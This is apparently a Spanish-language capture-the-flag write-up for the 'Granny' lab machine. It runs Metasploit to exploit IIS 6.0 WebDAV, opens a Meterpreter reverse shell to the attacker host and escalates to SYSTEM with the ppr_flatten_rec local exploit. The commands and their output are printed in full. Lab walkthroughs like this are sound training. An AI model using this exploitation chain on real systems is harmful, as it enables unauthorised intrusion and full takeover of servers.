Como siempre empezamos con un NMAP
root@Kali2:~/Desktop# nmap -sC -sV 10.10.10.15 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-18 14:24 CEST Nmap scan report for 10.10.10.15 Host is up (0.022s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT |_http-server-header: Microsoft-IIS/6.0 |_http-title: Under Construction | http-webdav-scan: | Server Date: Fri, 18 Oct 2019 12:24:42 GMT | Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK | Server Type: Microsoft-IIS/6.0 | WebDAV type: Unkown |_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.00 seconds
Lo único y al mismo tiempo más interesante es el IIS 6
Busque en searchsploit y Metasploit y me salieron un millon.
Google recomienda:
msf5 > use exploit/windows/iis/iis_webdav_upload_asp msf5 exploit(windows/iis/iis_webdav_upload_asp) > set rhost 10.10.10.15 rhost => 10.10.10.15 msf5 exploit(windows/iis/iis_webdav_upload_asp) > run [*] Started reverse TCP handler on 10.10.14.8:4444 [*] Checking /metasploit262514588.asp [*] Uploading 610960 bytes to /metasploit262514588.txt... [*] Moving /metasploit262514588.txt to /metasploit262514588.asp... [*] Executing /metasploit262514588.asp... [*] Deleting /metasploit262514588.asp (this doesn't always work)... [!] Deletion failed on /metasploit262514588.asp [403 Forbidden] [*] Sending stage (179779 bytes) to 10.10.10.15 [*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.15:1030) at 2019-10-18 14:31:06 +0200 meterpreter > shell [-] Failed to spawn shell with thread impersonation. Retrying without it. Process 1724 created. Channel 2 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. c:\windows\system32\inetsrv>whoami whoami nt authority\network service
Y es suficiente pero solo es un usuario de network services…
Asi que migramos a otro proceso:
exit meterpreter > background [*] Backgrounding session 1... msf5 exploit(windows/iis/iis_webdav_upload_asp) > use post/windows/manage/migrate msf5 post(windows/manage/migrate) > set session 1 session => 1 msf5 post(windows/manage/migrate) > run [*] Running module against GRANNY [*] Current server process: svchost.exe (824) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3164 [+] Successfully migrated to process 3164 [*] Post module execution completed
Y usamos el suggester
msf5 post(windows/manage/migrate) > use post/multi/recon/local_exploit_suggester msf5 post(multi/recon/local_exploit_suggester) > set session 1 session => 1 msf5 post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.15 - Collecting local exploits for x86/windows... [*] 10.10.10.15 - 29 exploit checks are being tried... [+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed
Hay muchos, a partir de ahora probamos hasta que encontramos uno interesante.
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ppr_flatten_rec msf5 exploit(windows/local/ppr_flatten_rec) > options Module options (exploit/windows/local/ppr_flatten_rec): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(windows/local/ppr_flatten_rec) > set session 1 session => 1 msf5 exploit(windows/local/ppr_flatten_rec) > run [*] Started reverse TCP handler on 172.16.10.164:4444 [*] Launching notepad to host the exploit... [+] Process 3952 launched. [*] Reflectively injecting the exploit DLL into 3952... [*] Injecting exploit into 3952 ... [*] Exploit injected. Injecting payload into 3952... [*] Payload injected. Executing exploit... [*] Exploit thread executing (can take a while to run), waiting 30 sec ... [*] Exploit completed, but no session was created. msf5 exploit(windows/local/ppr_flatten_rec) > ifconfig [*] exec: ifconfig
Aqui hubo un detalle esta usando un ip que no es [*] Started reverse TCP handler on 172.16.10.164:4444
Options no me mostraba mucho así que hay que usar advanced options.
Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.8 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(windows/local/ppr_flatten_rec) >
Ya con eso funciona
msf5 exploit(windows/local/ppr_flatten_rec) > set lhost 10.10.14.8 lhost => 10.10.14.8 msf5 exploit(windows/local/ppr_flatten_rec) > run [*] Started reverse TCP handler on 10.10.14.8:4444 [*] Launching notepad to host the exploit... [+] Process 1244 launched. [*] Reflectively injecting the exploit DLL into 1244... [*] Injecting exploit into 1244 ... [*] Exploit injected. Injecting payload into 1244... [*] Payload injected. Executing exploit... [*] Exploit thread executing (can take a while to run), waiting 30 sec ... [*] Sending stage (179779 bytes) to 10.10.10.15 [*] Meterpreter session 2 opened (10.10.14.8:4444 -> 10.10.10.15:1031) at 2019-10-18 14:37:32 +0200 meterpreter > shell Process 1732 created. Channel 1 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. c:\windows\system32\inetsrv>whoami whoami nt authority\system
Y ya somos admins 🙂
Me gusto mucho más que grandpa y acabo de tener una maquína nueva 🙂